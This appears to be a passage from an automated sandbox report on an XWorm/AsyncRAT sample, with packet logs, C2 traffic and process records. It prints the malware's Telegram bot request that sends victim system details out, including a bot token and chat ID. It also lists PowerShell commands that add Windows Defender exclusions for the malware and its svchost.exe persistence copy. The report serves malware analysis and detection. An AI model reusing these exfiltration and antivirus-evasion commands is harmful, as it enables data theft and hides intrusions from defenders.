Nov 21, 2024 22:22:07.016407967 CET	443	49749	149.154.167.220	192.168.2.4
Nov 21, 2024 22:22:07.016477108 CET	49749	443	192.168.2.4	149.154.167.220
Nov 21, 2024 22:22:07.023976088 CET	49749	443	192.168.2.4	149.154.167.220
Nov 21, 2024 22:22:07.142909050 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:07.262557983 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:07.264103889 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:07.299132109 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:07.424273968 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:14.748492002 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:14.791542053 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:14.813872099 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:14.934746981 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:14.934804916 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:14.934845924 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:14.934875011 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:14.934915066 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:14.935025930 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:14.935054064 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:20.920923948 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:21.041016102 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:21.488080025 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:21.541450977 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:21.558331013 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:21.677928925 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:21.698457003 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:21.744605064 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:21.751565933 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:21.871618032 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:21.871754885 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:28.854471922 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:28.891292095 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:29.011054039 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:29.011404037 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:29.011439085 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:29.056107998 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:34.542310953 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:34.661958933 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:35.196511030 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:35.200059891 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:35.320225000 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:35.586247921 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:35.635272026 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:35.642343044 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:35.761981010 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:35.762041092 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:35.762069941 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:35.762103081 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:35.762315035 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:35.762345076 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:35.762378931 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:42.240443945 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:42.286504984 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:42.406619072 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:42.406686068 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:42.406713963 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:42.406744957 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:42.406903982 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:42.406930923 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:42.406965017 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:48.167574883 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:48.287775040 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:48.648005009 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:48.649986982 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:48.769676924 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:49.359040976 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:49.400959969 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:49.417718887 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:49.537415981 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:49.537446022 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:49.537503958 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:49.537518978 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:49.537597895 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:49.537611008 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:49.537667990 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:49.569087982 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:49.619782925 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:55.621654034 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:55.666608095 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:55.687491894 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:22:55.807440042 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:55.807482004 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:22:55.807511091 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:23:01.060096979 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:23:01.104312897 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:23:01.195853949 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:23:01.315733910 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:23:01.315826893 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:23:01.315860033 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:23:01.360236883 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:23:01.792124033 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:23:01.912483931 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:23:06.834762096 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:23:06.885379076 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:23:07.729312897 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:23:07.775999069 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:23:10.137213945 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:23:10.193696022 CET	49755	8398	192.168.2.4	87.120.112.33
Nov 21, 2024 22:23:10.256789923 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:23:10.313443899 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:23:10.313615084 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:23:10.313647032 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:23:10.313703060 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:23:10.313750029 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:23:10.313779116 CET	8398	49755	87.120.112.33	192.168.2.4
Nov 21, 2024 22:23:10.313827038 CET	8398	49755	87.120.112.33	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 22:22:04.731816053 CET	64365	53	192.168.2.4	1.1.1.1
Nov 21, 2024 22:22:04.869993925 CET	53	64365	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 21, 2024 22:22:04.731816053 CET	192.168.2.4	1.1.1.1	0xeb4f	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 21, 2024 22:20:54.846045971 CET	1.1.1.1	192.168.2.4	0x322e	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:20:54.846045971 CET	1.1.1.1	192.168.2.4	0x322e	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:22:04.869993925 CET	1.1.1.1	192.168.2.4	0xeb4f	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49749	149.154.167.220	443	7312	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:22:06 UTC	448	OUT	GET /bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB905B3EB694EB551DA9%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20FO89G66H%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-21 21:22:07 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 21 Nov 2024 21:22:06 GMT Content-Type: application/json Content-Length: 439 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-21 21:22:07 UTC	439	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 36 37 33 30 30 34 30 35 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 74 65 61 6c 65 72 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 63 68 61 6c 6c 61 53 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 34 37 30 34 33 36 35 37 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 20 4d 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 68 65 6e 63 68 61 6e 67 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 32 32 34 31 32 36 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57 6f 72 6d 20 Data Ascii: {"ok":true,"result":{"message_id":1388,"from":{"id":6673004050,"is_bot":true,"first_name":"StealerBot","username":"MachallaSBot"},"chat":{"id":1470436579,"first_name":"H M","username":"chenchang1","type":"private"},"date":1732224126,"text":"\u2620 [XWorm

Target ID:	0
Start time:	16:20:59
Start date:	21/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x5c0000
File size:	74'240 bytes
MD5 hash:	8D52069BD117DA94E0B0B70E73E33FB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2950679638.0000000002A23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2950679638.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1674417480.00000000005C2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1674417480.00000000005C2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	16:21:02
Start date:	21/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:21:02
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:21:09
Start date:	21/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:21:09
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	16:21:21
Start date:	21/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	16:21:21
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	16:21:42
Start date:	21/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	16:21:42
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	16:22:13
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\svchost.exe"
Imagebase:	0x40000
File size:	74'240 bytes
MD5 hash:	8D52069BD117DA94E0B0B70E73E33FB0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\svchost.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\svchost.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\svchost.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	16:22:21
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\svchost.exe"
Imagebase:	0x70000
File size:	74'240 bytes
MD5 hash:	8D52069BD117DA94E0B0B70E73E33FB0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	24.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9A3BEAD8 Relevance: 2.5, Strings: 1, Instructions: 1220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFD9A3BF6A0

Memory Dump Source

Source File: 00000000.00000002.2976835535.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9a3b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 01252409994338a60e0af8e698f98633c0816a257d066ce75ba050919c47a3af
Instruction ID: f685a7ce1a3c0f6f4b617acecca4808f7a4d59f3083af313c68a743c354b52a7
Opcode Fuzzy Hash: 01252409994338a60e0af8e698f98633c0816a257d066ce75ba050919c47a3af
Instruction Fuzzy Hash: B4823221F2C9194BEBA8FBB88465A7973D3EF99304F5445BDD01EC32D6DE28E8428741

Function 00007FFD9A3B1729 Relevance: 2.0, Strings: 1, Instructions: 749
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CAP_^, xrefs: 00007FFD9A3B1A35

Memory Dump Source

Source File: 00000000.00000002.2976835535.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9a3b0000_file.jbxd

Similarity

API ID:
String ID: CAP_^
API String ID: 0-2920077663
Opcode ID: 4b6cf2c377f722271d55e6b06deff5ee56fd48b16b7bc41d5e4297689c3a63ac
Instruction ID: 27c8ac292dffb495e6dc61c86810cdb011fd92b83987f123553a02e517aca951
Opcode Fuzzy Hash: 4b6cf2c377f722271d55e6b06deff5ee56fd48b16b7bc41d5e4297689c3a63ac
Instruction Fuzzy Hash: E332A662F2DA495FE798FB6C84796B977D2FF98301B4405BEE00DC32D6DE28A8418741

Function 00007FFD9A3B2C88 Relevance: 1.7, APIs: 1, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFD9A3B3941

Memory Dump Source

Source File: 00000000.00000002.2976835535.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9a3b0000_file.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 44abf44dd764a08cbee24cc1a62b3cc5fd6ef15d6b867435bfeec590f2b98bea
Instruction ID: ad64be6a9a0ccccc1ee0cfb45ee08dc1b13e52b4b423d8d1dc548916081511eb
Opcode Fuzzy Hash: 44abf44dd764a08cbee24cc1a62b3cc5fd6ef15d6b867435bfeec590f2b98bea
Instruction Fuzzy Hash: FE412831E1CA598FE718EFA898666F97BE1EF95314F0402BFD04DC3197DA24A80587C1

Function 00007FFD9A3B30AD Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFD9A3B3182

Memory Dump Source

Source File: 00000000.00000002.2976835535.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9a3b0000_file.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: f7556645afd45f30d9263930eed369b902f54db4bdcb2d009844d9d68732fe17
Instruction ID: 2ed7d0e7ecd29e6b538e19699d94f881319ca2c11a0ca8cf9a1af572c654de3a
Opcode Fuzzy Hash: f7556645afd45f30d9263930eed369b902f54db4bdcb2d009844d9d68732fe17
Instruction Fuzzy Hash: 9541143190C6488FD719DFA8D855BE9BBF0EF96311F04416FD08AC3692CB746446CB91

Function 00007FFD9A3B3878 Relevance: 1.6, APIs: 1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFD9A3B3941

Memory Dump Source

Source File: 00000000.00000002.2976835535.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9a3b0000_file.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 998917e8e83b1af2eef06b9a18fa23527b11d2581a149d36635624b2cdd86e14
Instruction ID: 410f2c4db602e590d233ccc81f4dcbbdcc0a12ee5481ddda5c3e884dddac7429
Opcode Fuzzy Hash: 998917e8e83b1af2eef06b9a18fa23527b11d2581a149d36635624b2cdd86e14
Instruction Fuzzy Hash: 5431F731A1CA5D4FDB1CEBAC98566F9BBE1EB59325F04027FD04DC3296CE64A81287C1

Function 00007FFD9A3B2C58 Relevance: 1.6, APIs: 1, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFD9A3B3941

Memory Dump Source

Source File: 00000000.00000002.2976835535.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9a3b0000_file.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: dffc9747dc1e0f3829ccc4b6930783d33a9ebfed0cd9bb75351f910b11afb341
Instruction ID: c67699990888274fb729fad132a840a6a6461b93c78e32c85716e57ddc9ea9c6
Opcode Fuzzy Hash: dffc9747dc1e0f3829ccc4b6930783d33a9ebfed0cd9bb75351f910b11afb341
Instruction Fuzzy Hash: 46310731A1CA5C8FDB18EF9CD8566B9BBE1EF99311F00427FD04DC3292CA60A80287C1

Analysis Process: powershell.exePID: 7412, Parent PID: 7312COMMON

Executed Functions

Function 00007FFD9A3E644D Relevance: .7, Instructions: 727COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1772149325.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9a3e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d56d15c5aebd594f38ed43f0f3635448c09637f8afd3ecb230eba0b1892fbdba
Instruction ID: a9d307a84b343cfc51116c541181cc49441f2a8b0c6b246cba2a69f862ee6cf7
Opcode Fuzzy Hash: d56d15c5aebd594f38ed43f0f3635448c09637f8afd3ecb230eba0b1892fbdba
Instruction Fuzzy Hash: 6ED12031A18A4D8FDF99EF98C455AA97BF1FF68300F1441AAD409D7296CB34EC45CB81

Function 00007FFD9A4B6605 Relevance: .4, Instructions: 440COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1772921248.00007FFD9A4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9a4b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bc776df7adbe9e06a23e0a266249d02a7ba73aca940c05ab3259d115f1c9cf9
Instruction ID: 34d5e9fe17da5a3d7e2813f3b3c72b1abb1de59c594e5e2ec62b5e85e7141001
Opcode Fuzzy Hash: 0bc776df7adbe9e06a23e0a266249d02a7ba73aca940c05ab3259d115f1c9cf9
Instruction Fuzzy Hash: 3CD14A23A1EAC94FEB699B6848755B9BBE1EF16314B1801FFD05DCB0D7DA28E805C341

Function 00007FFD9A3EA0D3 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1772149325.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9a3e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8661b83d997c6bd942e53a074a4f942ae3109f43684977fc26afd158e472a09
Instruction ID: 7c5f26c72090470475e1174b533446b413ba526fe919e1184f82f0d2854162f3
Opcode Fuzzy Hash: b8661b83d997c6bd942e53a074a4f942ae3109f43684977fc26afd158e472a09
Instruction Fuzzy Hash: 4A115E22A1E7C58FD717AB7898750E47FB0EF53211B0D01EBD489CB0A3D5195D48C7A2

Function 00007FFD9A3E9D38 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1772149325.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9a3e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5081a6d391e8ee49059cd0b1ed57e3168ca05a9193e50775281260ae9cec35e8
Instruction ID: dcc315893c0d925b5db9061b7279d553ac6e5cdd8b63c53049769ca752e83056
Opcode Fuzzy Hash: 5081a6d391e8ee49059cd0b1ed57e3168ca05a9193e50775281260ae9cec35e8
Instruction Fuzzy Hash: A3F0E93291858C8FCB59DF6894245E47FE0FF25301B1401DBD44DC7061DA209D14C781

Function 00007FFD9A3E9865 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1772149325.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

